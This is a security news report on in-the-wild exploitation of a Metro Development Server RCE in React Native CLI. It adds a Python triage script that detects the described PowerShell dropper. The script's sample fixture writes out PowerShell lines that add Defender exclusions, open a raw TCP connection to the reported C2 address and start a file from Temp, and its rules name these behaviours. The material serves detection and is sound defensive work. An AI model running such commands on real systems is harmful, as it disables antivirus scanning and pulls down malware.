Threat actors exploit Metro4Shell RCE in React Native CLI

According to a technical analysis by VulnCheck, exploitation of CVE-2025-11953 was first observed on December 21, 2025. The flaw affects the Metro Development Server in the @react-native-community/cli package, carries a CVSS score of 9.8, and allows unauthenticated remote command execution.

KEY FACTS

  • Incident: Remote unauthenticated RCE in Metro Development Server
  • First observed: December 21, 2025
  • Severity: CVSS 9.8
  • Payload: Base64-encoded PowerShell downloader that writes and executes a Rust binary
  • Indicators: Multiple source IP addresses identified

The attacks were observed against a honeypot network and targeted the Metro Development Server component shipped with the React Native CLI. The activity persisted across multiple weeks with consistent payloads, which points to operational use rather than exploratory probing.

The exploit delivers a Base64-encoded PowerShell script that first adds Microsoft Defender Antivirus exclusions for the current working directory and for the user's temporary folder, C:\Users\[Username]\AppData\Local\Temp, so that files written to those locations are not scanned.

The script then opens a raw TCP connection to 8.218.43[.]248:60124, requests data, writes the response to a file in that temporary directory and executes it. The retrieved binary is written in Rust and includes anti-analysis checks that hinder inspection.

Observed source IP addresses included 5.109.182[.]231, 223.6.249[.]141 and 134.209.69[.]155. Reuse of identical payloads across incidents suggests a coordinated operational campaign.
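The behaviours described in the two payload paragraphs and the indicators listed above can be turned into a simple triage check over Windows process-creation telemetry. The following Python script is an added example, not code from the VulnCheck analysis or from the React Native CLI project: it decodes a PowerShell -EncodedCommand argument (Base64 of UTF-16LE), looks for Defender exclusion changes, temp-folder references, a raw System.Net.Sockets.TcpClient connection and the 8.218.43[.]248:60124 endpoint, and checks connecting addresses against the source IPs the article names. The rule names, regular expressions and sample command lines are constructed for this example and are assumptions about how such activity appears in Sysmon EID 1 or Security 4688 logs, not signatures from the report.

```python
"""Triage helper for Metro4Shell-style follow-on activity in Windows process-creation logs.

Added example, not code from the VulnCheck report or the React Native CLI project.
Rule names, regular expressions and the sample log lines are constructed for illustration.
"""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional

# Indicators quoted in the article (defanging brackets removed so they match raw log text).
C2_ENDPOINTS = {("8.218.43.248", 60124)}
SOURCE_IPS = {"5.109.182.231", "223.6.249.141", "134.209.69.155"}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; the argument is Base64 of UTF-16LE text.
ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Behaviours described in the article, expressed as regexes over the (decoded) command text. Assumed, not from the report.
RULES = {
    "defender-exclusion": re.compile(r"Add-MpPreference\b.*-ExclusionPath", re.IGNORECASE),
    "temp-dir-reference": re.compile(r"AppData\\Local\\Temp|\$env:TEMP\b|\$env:LOCALAPPDATA\\Temp", re.IGNORECASE),
    "raw-tcp-client": re.compile(r"Net\.Sockets\.TcpClient", re.IGNORECASE),
    "executes-file": re.compile(r"\bStart-Process\b|\bInvoke-Item\b", re.IGNORECASE),
}


@dataclass
class Result:
    line_no: int
    findings: List[str]
    high_confidence: bool
    decoded: Optional[str]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if absent or malformed."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def classify(text: str) -> List[str]:
    """Name every behaviour rule that fires on the given command text."""
    hits = [name for name, rx in RULES.items() if rx.search(text)]
    for ip, port in C2_ENDPOINTS:
        if ip in text and str(port) in text:
            hits.append("known-c2")
    return hits


def is_known_source(ip: str) -> bool:
    """True if the connecting address is one of the source IPs reported in the article."""
    return ip in SOURCE_IPS


def triage(log_lines: List[str]) -> List[Result]:
    """Classify each command line, scanning the decoded script as well when one is present.

    A line is high confidence when it both weakens Defender and reaches out over raw TCP
    (or to the reported C2 endpoint), which is the combination the article describes.
    """
    results = []
    for line_no, line in enumerate(log_lines, start=1):
        decoded = decode_encoded_command(line)
        text = line if decoded is None else line + "\n" + decoded
        hits = classify(text)
        high = "defender-exclusion" in hits and ("raw-tcp-client" in hits or "known-c2" in hits)
        results.append(Result(line_no, hits, high, decoded))
    return results


# Constructed stand-in for the described dropper: only the statements the rules look for, no working downloader.
SAMPLE_SCRIPT = (
    'Add-MpPreference -ExclusionPath (Get-Location).Path\n'
    'Add-MpPreference -ExclusionPath "$env:LOCALAPPDATA\\Temp"\n'
    '$c = New-Object System.Net.Sockets.TcpClient("8.218.43.248", 60124)\n'
    'Start-Process "$env:TEMP\\r.exe"'
)
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed command lines in Sysmon EID 1 / Security 4688 style; not real telemetry.
SAMPLE_LOG = [
    "powershell.exe -NoProfile -Command Get-ChildItem C:\\proj\\android",
    f"powershell.exe -nop -w hidden -enc {SAMPLE_ENCODED}",
    'powershell.exe -Command "Add-MpPreference -ExclusionPath C:\\Users\\dev\\AppData\\Local\\Temp"',
]

if __name__ == "__main__":
    for r in triage(SAMPLE_LOG):
        flag = "HIGH" if r.high_confidence else "    "
        print(f"{flag} line {r.line_no}: {', '.join(r.findings) or 'clean'}")
```

The third sample line shows why the exclusion rule alone is not enough to alert on: adding a Temp exclusion is noisy on developer machines, so the script only raises high confidence when the exclusion is paired with the raw TCP download in the same command. Feed real command lines into triage() and the connecting address into is_known_source() when hunting for the activity described here.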

WHY IT MATTERS

An unauthenticated remote code execution flaw in widely used development tooling lets attackers run arbitrary commands on developer machines and deliver persistent malware. Organizations should treat exposed development servers as production assets, limit their network exposure and apply the available fixes.